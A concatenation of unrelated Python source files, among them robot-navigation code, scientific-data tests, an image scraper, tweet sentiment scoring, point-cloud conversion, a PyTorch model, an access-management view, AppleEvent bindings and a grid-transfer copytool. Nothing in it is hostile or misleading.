prev = True
for i in xrange(1 + len(maskedPolarHistogram)):
mask = True if i == len(maskedPolarHistogram) else maskedPolarHistogram[i]
if prev == True and mask == False: # Right edge of a window.
right = self.__angle(i)
if prev == False and mask == True: # Left edge of a window.
left = self.__angle(i - 1)
openWindows.append( (right,left) )
prev = mask
return openWindows
def __candidates(self, openWindows, goalDir):
candidates = []
for (right, left) in openWindows:
if goalDir >= right and goalDir <= left:
candidates.append(goalDir)
# Note: Not distinguishing wide and narrow openings as in The Article.
candidates.append(right)
candidates.append(left)
return candidates
def __bestCandidate(self, candidates, goalDir, prevDir):
bestDir = None
bestCost = None
for dir in candidates:
cost = self.mu1 * abs(dir - goalDir) + self.mu3 * abs(dir - prevDir) #TODO: mu2
if bestDir is None or cost < bestCost:
bestDir = dir
bestCost = cost
return bestDir
def __remask(self, mask, n):
''' Rescales the mask to the given length.'''
m = len(mask)
if m == n:
return mask # no need to do anything
return [ mask[int(round(i * (m - 1) / float(n - 1)))] for i in xrange(n) ]
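# Illustrative usage sketch (not from the original source); the scan and goal direction below
# are example values:
# vfh = VFH(laserFOV=math.radians(270), turnRadius=None)
# vfh.update(scan)                       # scan: list of ranges in meters, right side first
# direction = vfh.navigate(goalDir=0.0)  # preferred steering direction [rad], or None if blocked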
|
##
from __future__ import absolute_import
from questgen.encoding import encoding
|
import pytest
import numpy as np
import reciprocalspaceship as rs
def test_merge_valueerror(hewl_merged):
"""
Confirm rs.algorithms.merge() raises ValueError when invoked with
merged DataSet
"""
with pytest.raises(ValueError):
merged = rs.algorithms.merge(hewl_merged)
@pytest.mark.parametrize("keys", [
None,
["I", "SIGI"],
["I", "SigI"],
])
@pytest.mark.parametrize("sort", [True, False])
def test_merge(hewl_unmerged, hewl_merged, keys, sort):
"""Test rs.algorithms.merge() against AIMLESS output"""
if keys is None:
merged = rs.algorithms.merge(hewl_unmerged, sort=sort)
elif not (keys[0] in hewl_unmerged.columns and keys[1] in hewl_unmerged.columns):
with pytest.raises(KeyError):
merged = rs.algorithms.merge(hewl_unmerged, keys[0], keys[1], sort=sort)
return
else:
merged = rs.algorithms.merge(hewl_unmerged, keys[0], keys[1], sort=sort)
# Check DataSet attributes
assert merged.merged
assert merged.spacegroup.xhm() == hewl_merged.spacegroup.xhm()
assert merged.cell.a == hewl_merged.cell.a
assert merged.index.is_monotonic_increasing == sort
# Note: AIMLESS zero-fills empty observations, whereas we use NaNs
for key in merged.columns:
assert np.allclose(merged.loc[hewl_merged.index, key].fillna(0),
hewl_merged.loc[hewl_merged.index, key])
|
import argparse
import json
import itertools
import logging
import re
import os
import uuid
import sys
from urllib.request import urlopen, Request
from bs4 import BeautifulSoup
REQUEST_HEADER = {
'User-Agent': "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36"}
def get_soup(url, header):
response = urlopen(Request(url, headers=header))
return BeautifulSoup(response, 'html.parser')
def get_query_url(query):
return "https://www.google.co.in/search?q=%s&source=lnms&tbm=isch" % query
def extract_images_from_soup(soup):
image_elements = soup.find_all("div", {"class": "rg_meta"})
metadata_dicts = (json.loads(e.text) for e in image_elements)
link_type_records = ((d["ou"], d["ity"]) for d in metadata_dicts)
return link_type_records
def extract_images(query, num_images):
url = get_query_url(query)
# logger.info("Souping")
soup = get_soup(url, REQUEST_HEADER)
# logger.info("Extracting image urls")
link_type_records = extract_images_from_soup(soup)
return itertools.islice(link_type_records, num_images)
def get_image_urls(query, num_images=10000):
query = '+'.join(query.split())
# logger.info("Extracting image links")
images = extract_images(query, num_images)
urls = []
for i, (url, image_type) in enumerate(images):
urls.append (url)
return urls
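# Illustrative usage sketch (not part of the original script); the query below is an example:
# if __name__ == '__main__':
#     for url in get_image_urls('golden retriever', num_images=5):
#         print(url)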
|
"""
@filename: process_tweets.py
@author: Matthew Mayo
@modified: 2014-04-25
@description: Calculates the sentiment score of tweets stored in
<tweet_file> by referencing term-value pairs in the
              <sentiment_file>; also calculates the length of each tweet;
outputs a triple of form [length, sentiment, capture_session]
with capture_session based on <tweet_file> name
@usage: python process_tweets.py <sentiment_file> <tweet_file>
"""
import sys
import json
"""
Process the text of a tweet word by word and return its sentiment value
"""
def get_sent(sent_dict, tweet_text):
tweet_sent = 0
tweet_words = (tweet_text.replace('\n', '').replace('\t', '').replace(',', '').replace('.', '').rsplit(' '))
# Process tweet
for word in tweet_words:
try:
tweet_sent = tweet_sent + sent_dict[word]
except(KeyError):
pass
return tweet_sent
"""
Parse sentiment file, build a dictionary of word sentiment values
"""
def build_sent_dict(sent_file):
sent_dict = {}
# Process sent file line by line
for line in sent_file:
sent_item = line.replace('\n', '').rsplit('\t')
sent_dict[sent_item[0]] = float(sent_item[1])
return sent_dict
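# The sentiment file is expected to hold one tab-separated "term<TAB>score" pair per line
# (e.g. an AFINN-style word list); the two lines below are illustrative, not real data:
#   abandon<TAB>-2
#   awesome<TAB>4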
"""
Process tweets, find their sentiment values and lengths
"""
def proc_tweets(sent_dict, tweet_file):
# Process tweets
for line in tweet_file:
try:
tweet = json.loads(line)
try:
place = tweet["place"]
lang = tweet["lang"]
# Only consider English tweets from US
if (place["country_code"] == "US" and lang == "en"):
tweet_text = tweet["text"]
sent = get_sent(sent_dict, tweet_text)
length = len(tweet_text)
                    # Below partially commented out to suppress printing of the actual tweets
print str(length) + "\t" + str(sent) + "\t" + sys.argv[2] # + "\t" + tweet_text.encode('utf-8')
except(KeyError, TypeError):
pass
except(KeyError):
pass
def main():
sent_file = open(sys.argv[1])
tweet_file = open(sys.argv[2])
sent_dict = build_sent_dict(sent_file)
proc_tweets(sent_dict, tweet_file)
if __name__ == '__main__':
main()
|
#write import statements for Player and Die class
from player import Player
from die import Die
#Create an instance of the Main class and call/execute the roll_doubles method
class Main():
    def run(self):
        # Sketch only: the exact Player/Die interfaces live in player.py and die.py;
        # here it is assumed Player exposes a roll_doubles(die) method.
        player = Player()
        player.roll_doubles(Die())
main = Main()
main.run()
|
import warnings
import numpy as np
import pandas as pd
def from_pyvista(poly_data, **kwargs):
"""Load a PyntCloud mesh from PyVista's PolyData instance"""
try:
import pyvista as pv
except ImportError:
raise ImportError("PyVista must be installed. Try `pip install pyvista`")
if not isinstance(poly_data, pv.PolyData):
raise TypeError("Type {} not yet supported for conversion.".format(type(poly_data)))
mesh = None
if poly_data.faces.ndim > 1:
mesh = poly_data.faces
if not np.all(3 == mesh[:, 0]):
raise ValueError(
"This mesh is not triangulated. Try triangulating the mesh before passing to PyntCloud.")
mesh = pd.DataFrame(data=mesh[:, 1:], columns=['v1', 'v2', 'v3'])
points = pd.DataFrame(data=poly_data.points, columns=["x", "y", "z"])
scalars = poly_data.point_arrays
for name, array in scalars.items():
if array.ndim == 1:
points[name] = array
elif array.ndim == 2:
if name == "RGB":
points["red"] = array[:, 0]
points["green"] = array[:, 1]
points["blue"] = array[:, 2]
elif name == "Normals":
points["nx"] = array[:, 0]
points["ny"] = array[:, 1]
points["nz"] = array[:, 2]
else:
for n in range(array.shape[1]):
points["{}_{}".format(name, n)] = array[:, n]
else:
warnings.warn("Ignoring scalar field {} with ndim > 2 ({})".format(name, array.ndim))
return {
"points": points,
"mesh": mesh
}
def to_pyvista(cloud, mesh=False, use_as_color=("red", "green", "blue"), **kwargs):
"""Convert PyntCloud's instance `cloud` to PyVista's PolyData instance"""
try:
import pyvista as pv
except ImportError:
raise ImportError('PyVista must be installed. Try `pip install pyvista`')
if mesh and cloud.mesh is not None:
mesh = cloud.mesh[["v1", "v2", "v3"]].values
else:
mesh = None
# Either make point cloud or triangulated mesh
if mesh is not None:
# Update cells of PolyData
types = np.full(len(mesh), 3, dtype=int)
faces = np.insert(mesh, 0, types, axis=1)
poly = pv.PolyData(cloud.xyz, faces)
else:
poly = pv.PolyData(cloud.xyz)
avoid = ["x", "y", "z"]
# add scalar arrays
if all(c in cloud.points.columns for c in use_as_color):
colors = cloud.points[list(use_as_color)].values
poly.point_arrays["RGB"] = colors
avoid += list(use_as_color)
# Add other arrays
for name in cloud.points.columns:
if name not in avoid:
poly.point_arrays[name] = cloud.points[name]
return poly
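# Illustrative round-trip sketch (not part of the original module); `cloud` is assumed to be a
# pyntcloud.PyntCloud instance built elsewhere:
# poly = to_pyvista(cloud, mesh=True)   # PyntCloud -> pyvista.PolyData
# data = from_pyvista(poly)             # pyvista.PolyData -> {"points": ..., "mesh": ...}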
|
"""Delete group API method."""
from ibsng.handler.handler import Handler
class delGroup(Handler):
"""Delete group method class."""
def control(self):
"""Validate inputs after setup method.
:return: None
:rtype: None
"""
self.is_valid(self.group_name, str)
def setup(self, group_name):
"""Setup required parameters.
:param str group_name: group name
:return: None
:rtype: None
"""
self.group_name = group_name
|
import torch
import torch.nn as nn
import torch.nn.functional as F
import functools
from .SurfaceClassifier import conv1_1, period_loss
# from .DepthNormalizer import DepthNormalizer
from ..net_util import *
# from iPERCore.models.networks.criterions import VGGLoss
from lib.model.Models import NestedUNet
import numpy as np
class Pint_Model(nn.Module):
def __init__(self, opt):
super(Pint_Model, self).__init__()
self.period_loss = period_loss()
self.feat_uv_error = nn.SmoothL1Loss() # A feature with B uvmap
self.opt = opt
self.NUnet = NestedUNet(in_ch=3, out_ch=3)
norm_type = get_norm_layer(norm_type=opt.norm_color)
self.image_filter = ResnetFilter(opt, norm_layer=norm_type)
# self.conv = conv1_1(input_layers=256, output_layers=16)
init_net(self)
def filter(self, images):
'''
Filter the input images
store all intermediate features.
:param images: [B, C, H, W] input images
'''
self.im_feat = self.image_filter(images)
def forward(self, uv_A, uv_B, part_uv_B, index):
'''
        Forward pass used for the full Pint training.
'''
complete_feat = self.NUnet(uv_A)
complete_feat_B = self.NUnet(uv_B)
# im_feat = self.image_filter(uv_A) # B C H W for 512 uv_B, B 256 128 128
# complete_feat = self.conv(im_feat) # B 16 128 128 -> b 16 512 512 [0:3] loss
# im_feat_B = self.image_filter(uv_B)
# complete_feat_B = self.conv(im_feat_B)
# A_feat = F.interpolate(complete_feat[:,0:3,:,:], scale_factor=4, mode='bilinear', align_corners=True) # in this param, A_feat means complete feature.
# part_uv_B.requires_grad=True # to make uvb as one leaf
# A_feat = complete_feat[:,0:3,:,:]
# part_uv_B = F.interpolate(part_uv_B, scale_factor=0.25, mode='bilinear', align_corners=True)
A_vis_feat = complete_feat[index==1]
B_vis_uv = part_uv_B[index==1]
loss1 = self.feat_uv_error(A_vis_feat, B_vis_uv.detach())
# loss2 = self.vgg_loss(complete_feat[:,:3], complete_feat_B[:,:3].detach())
# loss2 = self.period_loss(complete_feat, complete_feat_B.detach())
loss2=0
return complete_feat, complete_feat_B, loss1, loss2
# def pint_forward(self, uv_A, uv_B):
# '''
# this function is made for pint total train.
# '''
# im_feat = self.image_filter(uv_A) # B C H W for 512 uv_B, B 256 128 128
# self.complete_feat = self.conv(im_feat) # B 16 128 128 -> b 16 512 512 [0:3] loss
# im_feat_B = self.image_filter(uv_B.squeeze(1))
# complete_feat_B = self.conv(im_feat_B)
# A_feat = F.interpolate(self.complete_feat[:,0:3,:,:], scale_factor=4, mode='bilinear', align_corners=True) # in this param, A_feat means complete feature.
# uv_B_feat = uv_B.squeeze(1).expand_as(A_feat)
# uv_B_feat.requires_grad=True # to make uvb as one leaf
# A_vis_feat = A_feat[uv_B_feat != 0.0]
# B_vis_uv = uv_B_feat[uv_B_feat != 0.0]
# loss_content = self.feat_uv_error(A_vis_feat, B_vis_uv) * 100
# loss_content1 = self.feat_uv_error(A_feat, uv_A)*100
# # loss_feat = self.error_term(self.complete_feat, complete_feat_B)
# return A_feat, A_vis_feat, B_vis_uv, self.complete_feat, complete_feat_B, loss_content+loss_content1
class ResnetBlock(nn.Module):
"""Define a Resnet block"""
def __init__(self, dim, padding_type, norm_layer, use_dropout, use_bias, last=False):
"""Initialize the Resnet block
A resnet block is a conv block with skip connections
We construct a conv block with build_conv_block function,
and implement skip connections in <forward> function.
Original Resnet paper: https://arxiv.org/pdf/1512.03385.pdf
"""
super(ResnetBlock, self).__init__()
self.conv_block = self.build_conv_block(dim, padding_type, norm_layer, use_dropout, use_bias, last)
def build_conv_block(self, dim, padding_type, norm_layer, use_dropout, use_bias, last=False):
"""Construct a convolutional block.
Parameters:
dim (int) -- the number of channels in the conv layer.
padding_type (str) -- the name of padding layer: reflect | replicate | zero
norm_layer -- normalization layer
use_dropout (bool) -- if use dropout layers.
use_bias (bool) -- if the conv layer uses bias or not
Returns a conv block (with a conv layer, a normalization layer, and a non-linearity layer (ReLU))
"""
conv_block = []
p = 0
if padding_type == 'reflect':
conv_block += [nn.ReflectionPad2d(1)]
elif padding_type == 'replicate':
conv_block += [nn.ReplicationPad2d(1)]
elif padding_type == 'zero':
p = 1
else:
raise NotImplementedError('padding [%s] is not implemented' % padding_type)
conv_block += [nn.Conv2d(dim, dim, kernel_size=3, padding=p, bias=use_bias), norm_layer(dim), nn.ReLU(True)]
if use_dropout:
conv_block += [nn.Dropout(0.5)]
p = 0
if padding_type == 'reflect':
conv_block += [nn.ReflectionPad2d(1)]
elif padding_type == 'replicate':
conv_block += [nn.ReplicationPad2d(1)]
elif padding_type == 'zero':
p = 1
else:
raise NotImplementedError('padding [%s] is not implemented' % padding_type)
if last:
conv_block += [nn.Conv2d(dim, dim, kernel_size=3, padding=p, bias=use_bias)]
else:
conv_block += [nn.Conv2d(dim, dim, kernel_size=3, padding=p, bias=use_bias), norm_layer(dim)]
return nn.Sequential(*conv_block)
def forward(self, x):
"""Forward function (with skip connections)"""
out = x + self.conv_block(x) # add skip connections
return out
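# Illustrative sketch (not part of the original file): a ResnetBlock preserves the spatial size
# and channel count of its input; the 256-channel tensor below is an example value.
# block = ResnetBlock(256, padding_type='reflect', norm_layer=nn.BatchNorm2d,
#                     use_dropout=False, use_bias=False)
# y = block(torch.randn(1, 256, 32, 32))   # y has shape [1, 256, 32, 32]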
class ResnetFilter(nn.Module):
"""Resnet-based generator that consists of Resnet blocks between a few downsampling/upsampling operations.
We adapt Torch code and idea from Justin Johnson's neural style transfer project(https://github.com/jcjohnson/fast-neural-style)
"""
def __init__(self, opt, input_nc=3, output_nc=256, ngf=64, norm_layer=nn.BatchNorm2d, use_dropout=False,
n_blocks=6, padding_type='reflect'):
"""Construct a Resnet-based generator
Parameters:
input_nc (int) -- the number of channels in input images
output_nc (int) -- the number of channels in output images
ngf (int) -- the number of filters in the last conv layer
norm_layer -- normalization layer
use_dropout (bool) -- if use dropout layers
n_blocks (int) -- the number of ResNet blocks
padding_type (str) -- the name of padding layer in conv layers: reflect | replicate | zero
"""
assert (n_blocks >= 0)
super(ResnetFilter, self).__init__()
if type(norm_layer) == functools.partial:
use_bias = norm_layer.func == nn.InstanceNorm2d
else:
use_bias = norm_layer == nn.InstanceNorm2d
model = [nn.ReflectionPad2d(3),
nn.Conv2d(input_nc, ngf, kernel_size=7, padding=0, bias=use_bias),
norm_layer(ngf),
nn.ReLU(True)]
n_downsampling = 2
for i in range(n_downsampling): # add downsampling layers
mult = 2 ** i
model += [nn.Conv2d(ngf * mult, ngf * mult * 2, kernel_size=3, stride=2, padding=1, bias=use_bias),
norm_layer(ngf * mult * 2),
nn.ReLU(True)]
mult = 2 ** n_downsampling
for i in range(n_blocks): # add ResNet blocks
if i == n_blocks - 1:
model += [ResnetBlock(ngf * mult, padding_type=padding_type, norm_layer=norm_layer,
use_dropout=use_dropout, use_bias=use_bias, last=True)]
else:
model += [ResnetBlock(ngf * mult, padding_type=padding_type, norm_layer=norm_layer,
use_dropout=use_dropout, use_bias=use_bias)]
if opt.use_tanh:
model += [nn.Tanh()]
self.model = nn.Sequential(*model)
def forward(self, input):
"""Standard forward"""
return self.model(input)
|
"""
The roseguarden project
Copyright (C) 2018-2020 Marcus Drobisch,
This program is free software: you can redistribute it and/or modify it under
the terms of the GNU General Public License as published by the Free Software
Foundation, either version 3 of the License, or (at your option) any later
version.
This program is distributed in the hope that it will be useful, but WITHOUT
ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License along with
this program. If not, see <http://www.gnu.org/licenses/>.
"""
__authors__ = ["Marcus Drobisch"]
__contact__ = "[email protected]"
__credits__ = []
__license__ = "GPLv3"
from core.workspaces.workspace import Workspace
from core.workspaces.dataView import DataView
from core.users.models import User
import arrow
from workspaces.Access.models import SpaceAccessGroup
""" A view contaning the list of accessGroups
"""
class AccessGroupsList(DataView):
uri = 'accessUserList'
requireLogin = True
def defineProperties(self):
self.addMailProperty(name='email', label='User email', isKey=True)
self.addStringProperty(name='name', label='User name')
self.addIntegerProperty(name="access_group", label="Access group")
self.addIntegerProperty(name="access_type", label="Access type")
self.addBooleanProperty(name='use_group_budget', label='Group budget', hide=True)
self.addBooleanProperty(name='budget_needed', label='Needs budget', hide=True)
self.addIntegerProperty(name='access_budget', label='Budget')
self.addDateProperty(name='access_start_date', label='Valid from')
self.addDateProperty(name='access_end_date', label='Expires at')
self.addDateProperty(name='access_last_update', label='Last updated', readOnly=True)
def getViewHandler(self, user: User, workspace: Workspace, query=None):
print("getDataViewHandler for AccessUserList")
userlist = []
all_user = User.query.filter_by(account_locked=False).all()
for u in all_user:
# get new empty entry
entry = self.createEntry()
# fill entry
entry.email = u.email
entry.name = "{0} {1}".format(u.firstname, u.lastname)
if u.access is not None:
entry.access_budget = u.access.access_budget
entry.access_start_date = u.access.access_start_date.format('YYYY-MM-DD')
if u.access.access_expires:
entry.access_end_date = u.access.access_expire_date.format('YYYY-MM-DD')
else:
entry.access_end_date = None
entry.access_last_update = u.access.access_last_update_date.format('YYYY-MM-DD')
else:
entry.access_start_date = "-"
entry.access_end_date = "-"
entry.access_last_update = "-"
if u.spaceaccess_accessgroup is not None:
entry.access_type = u.spaceaccess_accessgroup.access_type.value
entry.access_group = u.spaceaccess_accessgroup.id
entry.budget_needed = u.spaceaccess_accessgroup.access_need_budget
entry.use_group_budget = u.spaceaccess_accessgroup.access_use_group_budget
if entry.use_group_budget:
entry.access_budget = u.spaceaccess_accessgroup.group_budget
else:
entry.access_group = -1
entry.budget_needed = False
entry.access_type = "-"
entry.use_group_budget = False
userlist.append(entry.extract())
return userlist
def __repr__(self):
return '<{} with {} properties>'.format(self.name, len(self.properties))
# Handler for a request to create a new view entry
def createViewEntryHandler(self, user, workspace, entry):
raise Exception("User creation not allowed in userAccess view")
# Handler for a request to update a single view entry
def updateViewEntryHandler(self, user, workspace, key, entry):
print("Handle updateViewEntryHandler request for " + self.uri)
u = User.query.filter_by(email=key).first()
if u.access is not None:
u.access.access_last_update_date = arrow.utcnow()
if hasattr(entry, 'access_start_date'):
u.access.access_start_date = arrow.get(entry.access_start_date, 'YYYY-MM-DD')
if hasattr(entry, 'access_end_date'):
if entry.access_end_date is not None:
u.access.access_expires = True
u.access.access_expire_date = arrow.get(entry.access_end_date, 'YYYY-MM-DD')
if hasattr(entry, 'access_budget'):
if u.spaceaccess_accessgroup is not None and u.spaceaccess_accessgroup.access_use_group_budget:
u.spaceaccess_accessgroup.group_budget = entry.access_budget
else:
u.access.access_budget = entry.access_budget
if hasattr(entry, 'access_group'):
                g = SpaceAccessGroup.query.filter_by(id=entry.access_group).first()
u.spaceaccess_accessgroup = g
self.emitSyncUpdate(key)
# Handler for a request to update a single view entry
def removeViewEntryHandler(self, user, workspace, key):
raise Exception("User removal not allowed in userAccess view")
|
"""Suite Standard Suite: Common terms for most applications
Level 1, version 1
Generated from /Volumes/Sap/Applications (Mac OS 9)/Metrowerks CodeWarrior 7.0/Metrowerks CodeWarrior/CodeWarrior IDE 4.2.5
AETE/AEUT resource version 1/0, language 0, script 0
"""
import aetools
import MacOS
_code = 'CoRe'
from StdSuites.Standard_Suite import *
class Standard_Suite_Events(Standard_Suite_Events):
_argmap_close = {
'saving' : 'savo',
'saving_in' : 'kfil',
}
def close(self, _object, _attributes={}, **_arguments):
"""close: close an object
Required argument: the object to close
Keyword argument saving: specifies whether or not changes should be saved before closing
Keyword argument saving_in: the file in which to save the object
Keyword argument _attributes: AppleEvent attribute dictionary
"""
_code = 'core'
_subcode = 'clos'
aetools.keysubst(_arguments, self._argmap_close)
_arguments['----'] = _object
aetools.enumsubst(_arguments, 'savo', _Enum_savo)
_reply, _arguments, _attributes = self.send(_code, _subcode,
_arguments, _attributes)
if _arguments.get('errn', 0):
raise aetools.Error, aetools.decodeerror(_arguments)
# XXXX Optionally decode result
if _arguments.has_key('----'):
return _arguments['----']
_argmap_count = {
'each' : 'kocl',
}
def count(self, _object, _attributes={}, **_arguments):
"""count: return the number of elements of a particular class within an object
Required argument: the object whose elements are to be counted
Keyword argument each: the class of the elements to be counted. Keyword 'each' is optional in AppleScript
Keyword argument _attributes: AppleEvent attribute dictionary
Returns: the number of elements
"""
_code = 'core'
_subcode = 'cnte'
aetools.keysubst(_arguments, self._argmap_count)
_arguments['----'] = _object
_reply, _arguments, _attributes = self.send(_code, _subcode,
_arguments, _attributes)
if _arguments.get('errn', 0):
raise aetools.Error, aetools.decodeerror(_arguments)
# XXXX Optionally decode result
if _arguments.has_key('----'):
return _arguments['----']
_argmap_get = {
'as' : 'rtyp',
}
def get(self, _object, _attributes={}, **_arguments):
"""get: get the data for an object
Required argument: the object whose data is to be returned
Keyword argument as: the desired types for the data, in order of preference
Keyword argument _attributes: AppleEvent attribute dictionary
Returns: The data from the object
"""
_code = 'core'
_subcode = 'getd'
aetools.keysubst(_arguments, self._argmap_get)
_arguments['----'] = _object
_reply, _arguments, _attributes = self.send(_code, _subcode,
_arguments, _attributes)
if _arguments.get('errn', 0):
raise aetools.Error, aetools.decodeerror(_arguments)
# XXXX Optionally decode result
if _arguments.has_key('----'):
return _arguments['----']
_argmap_make = {
'new' : 'kocl',
'as' : 'rtyp',
'at' : 'insh',
'with_data' : 'data',
'with_properties' : 'prdt',
}
def make(self, _no_object=None, _attributes={}, **_arguments):
"""make: make a new element
        Keyword argument new: the class of the new element. Keyword 'new' is optional in AppleScript
Keyword argument as: the desired types for the data, in order of preference
Keyword argument at: the location at which to insert the element
Keyword argument with_data: the initial data for the element
Keyword argument with_properties: the initial values for the properties of the element
Keyword argument _attributes: AppleEvent attribute dictionary
Returns: to the new object(s)
"""
_code = 'core'
_subcode = 'crel'
aetools.keysubst(_arguments, self._argmap_make)
if _no_object != None: raise TypeError, 'No direct arg expected'
_reply, _arguments, _attributes = self.send(_code, _subcode,
_arguments, _attributes)
if _arguments.get('errn', 0):
raise aetools.Error, aetools.decodeerror(_arguments)
# XXXX Optionally decode result
if _arguments.has_key('----'):
return _arguments['----']
def select(self, _object=None, _attributes={}, **_arguments):
"""select: select the specified object
Required argument: the object to select
Keyword argument _attributes: AppleEvent attribute dictionary
"""
_code = 'misc'
_subcode = 'slct'
if _arguments: raise TypeError, 'No optional args expected'
_arguments['----'] = _object
_reply, _arguments, _attributes = self.send(_code, _subcode,
_arguments, _attributes)
if _arguments.get('errn', 0):
raise aetools.Error, aetools.decodeerror(_arguments)
# XXXX Optionally decode result
if _arguments.has_key('----'):
return _arguments['----']
_argmap_set = {
'to' : 'data',
}
def set(self, _object, _attributes={}, **_arguments):
"""set: set an object's data
Required argument: the object to change
Keyword argument to: the new value
Keyword argument _attributes: AppleEvent attribute dictionary
"""
_code = 'core'
_subcode = 'setd'
aetools.keysubst(_arguments, self._argmap_set)
_arguments['----'] = _object
_reply, _arguments, _attributes = self.send(_code, _subcode,
_arguments, _attributes)
if _arguments.get('errn', 0):
raise aetools.Error, aetools.decodeerror(_arguments)
# XXXX Optionally decode result
if _arguments.has_key('----'):
return _arguments['----']
class application(aetools.ComponentItem):
"""application - an application program """
want = 'capp'
class _Prop_user_interaction(aetools.NProperty):
"""user interaction - user interaction level """
which = 'inte'
want = 'Inte'
user_interaction = _Prop_user_interaction()
# element 'cwin' as ['indx', 'name', 'rang']
# element 'docu' as ['indx', 'name', 'rang']
class character(aetools.ComponentItem):
"""character - a character """
want = 'cha '
class _Prop_length(aetools.NProperty):
"""length - length in characters of this object """
which = 'pLen'
want = 'long'
class _Prop_offset(aetools.NProperty):
"""offset - offset of a text object from the beginning of the document (first char has offset 1) """
which = 'pOff'
want = 'long'
class insertion_point(aetools.ComponentItem):
"""insertion point - An insertion location between two objects """
want = 'cins'
class line(aetools.ComponentItem):
"""line - lines of text """
want = 'clin'
class _Prop_index(aetools.NProperty):
"""index - index of a line object from the beginning of the document (first line has index 1) """
which = 'pidx'
want = 'long'
# element 'cha ' as ['indx', 'rang', 'rele']
lines = line
class selection_2d_object(aetools.ComponentItem):
"""selection-object - the selection visible to the user """
want = 'csel'
class _Prop_contents(aetools.NProperty):
"""contents - the contents of the selection """
which = 'pcnt'
want = 'type'
# element 'cha ' as ['indx', 'rele', 'rang', 'test']
# element 'clin' as ['indx', 'rang', 'rele']
# element 'ctxt' as ['rang']
class text(aetools.ComponentItem):
"""text - Text """
want = 'ctxt'
# element 'cha ' as ['indx', 'rele', 'rang']
# element 'cins' as ['rele']
# element 'clin' as ['indx', 'rang', 'rele']
# element 'ctxt' as ['rang']
class window(aetools.ComponentItem):
"""window - A window """
want = 'cwin'
class _Prop_bounds(aetools.NProperty):
"""bounds - the boundary rectangle for the window """
which = 'pbnd'
want = 'qdrt'
class _Prop_document(aetools.NProperty):
"""document - the document that owns this window """
which = 'docu'
want = 'docu'
class _Prop_name(aetools.NProperty):
"""name - the title of the window """
which = 'pnam'
want = 'itxt'
class _Prop_position(aetools.NProperty):
"""position - upper left coordinates of window """
which = 'ppos'
want = 'QDpt'
class _Prop_visible(aetools.NProperty):
"""visible - is the window visible? """
which = 'pvis'
want = 'bool'
class _Prop_zoomed(aetools.NProperty):
"""zoomed - Is the window zoomed? """
which = 'pzum'
want = 'bool'
windows = window
class document(aetools.ComponentItem):
"""document - a document """
want = 'docu'
class _Prop_file_permissions(aetools.NProperty):
"""file permissions - the file permissions for the document """
which = 'PERM'
want = 'PERM'
class _Prop_kind(aetools.NProperty):
"""kind - the kind of document """
which = 'DKND'
want = 'DKND'
class _Prop_location(aetools.NProperty):
"""location - the file of the document """
which = 'FILE'
want = 'fss '
class _Prop_window(aetools.NProperty):
"""window - the window of the document. """
which = 'cwin'
want = 'cwin'
documents = document
class files(aetools.ComponentItem):
"""files - Every file """
want = 'file'
file = files
application._superclassnames = []
application._privpropdict = {
'user_interaction' : _Prop_user_interaction,
}
application._privelemdict = {
'document' : document,
'window' : window,
}
character._superclassnames = []
character._privpropdict = {
'length' : _Prop_length,
'offset' : _Prop_offset,
}
character._privelemdict = {
}
insertion_point._superclassnames = []
insertion_point._privpropdict = {
'length' : _Prop_length,
'offset' : _Prop_offset,
}
insertion_point._privelemdict = {
}
line._superclassnames = []
line._privpropdict = {
'index' : _Prop_index,
'length' : _Prop_length,
'offset' : _Prop_offset,
}
line._privelemdict = {
'character' : character,
}
selection_2d_object._superclassnames = []
selection_2d_object._privpropdict = {
'contents' : _Prop_contents,
'length' : _Prop_length,
'offset' : _Prop_offset,
}
selection_2d_object._privelemdict = {
'character' : character,
'line' : line,
'text' : text,
}
text._superclassnames = []
text._privpropdict = {
'length' : _Prop_length,
'offset' : _Prop_offset,
}
text._privelemdict = {
'character' : character,
'insertion_point' : insertion_point,
'line' : line,
'text' : text,
}
window._superclassnames = []
window._privpropdict = {
'bounds' : _Prop_bounds,
'document' : _Prop_document,
'index' : _Prop_index,
'name' : _Prop_name,
'position' : _Prop_position,
'visible' : _Prop_visible,
'zoomed' : _Prop_zoomed,
}
window._privelemdict = {
}
document._superclassnames = []
document._privpropdict = {
'file_permissions' : _Prop_file_permissions,
'index' : _Prop_index,
'kind' : _Prop_kind,
'location' : _Prop_location,
'name' : _Prop_name,
'window' : _Prop_window,
}
document._privelemdict = {
}
files._superclassnames = []
files._privpropdict = {
}
files._privelemdict = {
}
#
# Indices of types declared in this module
#
_classdeclarations = {
'capp' : application,
'cha ' : character,
'cins' : insertion_point,
'clin' : line,
'csel' : selection_2d_object,
'ctxt' : text,
'cwin' : window,
'docu' : document,
'file' : files,
}
_propdeclarations = {
'DKND' : _Prop_kind,
'FILE' : _Prop_location,
'PERM' : _Prop_file_permissions,
'cwin' : _Prop_window,
'docu' : _Prop_document,
'inte' : _Prop_user_interaction,
'pLen' : _Prop_length,
'pOff' : _Prop_offset,
'pbnd' : _Prop_bounds,
'pcnt' : _Prop_contents,
'pidx' : _Prop_index,
'pnam' : _Prop_name,
'ppos' : _Prop_position,
'pvis' : _Prop_visible,
'pzum' : _Prop_zoomed,
}
_compdeclarations = {
}
_enumdeclarations = {
}
|
#!/usr/bin/env python
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#
# Authors:
# - Tobias Wegner, [email protected], 2017-2018
# - Paul Nilsson, [email protected], 2017-2021
# Reimplemented by Alexey Anisenkov
import os
import logging
import re
from time import time
from .common import resolve_common_transfer_errors, verify_catalog_checksum #, get_timeout
from pilot.util.container import execute
from pilot.common.exception import PilotException, ErrorCodes
#from pilot.util.timer import timeout
logger = logging.getLogger(__name__)
require_replicas = True ## indicate if given copytool requires input replicas to be resolved
allowed_schemas = ['root'] # prioritized list of supported schemas for transfers by given copytool
copy_command = 'xrdcp'
def is_valid_for_copy_in(files):
return True ## FIX ME LATER
def is_valid_for_copy_out(files):
return True ## FIX ME LATER
def _resolve_checksum_option(setup, **kwargs):
cmd = "%s --version" % copy_command
if setup:
cmd = "source %s; %s" % (setup, cmd)
logger.info("Execute command (%s) to check xrdcp client version", cmd)
rcode, stdout, stderr = execute(cmd, **kwargs)
logger.info("return code: %s", rcode)
logger.info("return output: %s", stdout + stderr)
